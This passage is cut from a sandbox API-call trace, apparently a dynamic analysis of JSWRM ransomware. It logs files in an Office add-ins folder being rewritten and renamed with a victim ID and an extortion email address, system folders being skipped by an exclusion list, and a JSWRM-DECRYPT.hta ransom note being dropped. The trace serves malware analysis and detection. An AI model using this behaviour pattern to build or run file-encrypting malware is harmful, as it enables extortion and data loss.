Add-in\\sk\\PowerViewRes.sk.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sk\\powerviewres.sk.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.290] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=328292) returned 1 [0125.290] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0125.291] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.304] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.304] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.305] CloseHandle (hObject=0x338) returned 1 [0125.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0125.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0125.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0125.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0125.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0125.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0125.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.305] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sk\\PowerViewRes.sk.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sk\\powerviewres.sk.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sk\\PowerViewRes.sk.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sk\\powerviewres.sk.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0125.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0125.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0125.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0125.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.307] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15e92299, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15e92299, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15eb84b3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50264, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.sk.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.307] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0125.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0125.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0125.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0125.307] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b359a5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e45dad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15e45dad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0125.307] lstrcmpiW (lpString1="sl", lpString2=".") returned 1 [0125.307] lstrcmpiW (lpString1="sl", lpString2="..") returned 1 [0125.307] lstrcmpiW (lpString1="sl", lpString2="...") returned 1 [0125.307] lstrcmpiW (lpString1="sl", lpString2="windows") returned -1 [0125.307] lstrcmpiW (lpString1="sl", lpString2="recovery") returned 1 [0125.307] lstrcmpiW (lpString1="sl", lpString2="perflogs") returned 1 [0125.307] lstrcmpiW (lpString1="sl", lpString2="documents and settings") returned 1 [0125.307] lstrcmpiW (lpString1="sl", lpString2="$RECYCLE.BIN") returned 1 [0125.307] lstrcmpiW (lpString1="sl", lpString2="system volume information") returned -1 [0125.307] lstrcmpiW (lpString1="sl", lpString2="msocache") returned 1 [0125.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0125.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0125.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0125.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0125.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0125.307] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0125.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sl\\jswrm-decrypt.hta")) returned 0xffffffff [0125.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0125.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x2501e8 [0125.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x251fb8 [0125.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0125.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0125.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0125.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.312] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.312] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.313] CloseHandle (hObject=0x314) returned 1 [0125.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0125.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x251fb8 | out: hHeap=0x1e0000) returned 1 [0125.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0125.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0125.314] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sl\\jswrm-decrypt.hta")) returned 0x20 [0125.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0125.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0125.314] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sl\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b359a5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e45dad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x415b59a6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0125.314] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.314] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b359a5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e45dad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x415b59a6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.314] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.314] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.314] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1b359a5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1b359a5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x15e92299, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4868, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.315] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.315] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241358, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0125.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0125.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0125.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0125.315] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x415b59a6, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x415b59a6, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x415b59a6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0125.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0125.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0125.316] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d8c51, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42d8c51, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42d8c51, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12070, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.316] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.316] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.316] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.316] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.316] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.316] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.316] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.316] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.316] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.316] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0125.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0125.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0125.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.316] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd09866, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd09866, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0125.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d800, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0125.317] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5f4ff2d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f4ff2d, 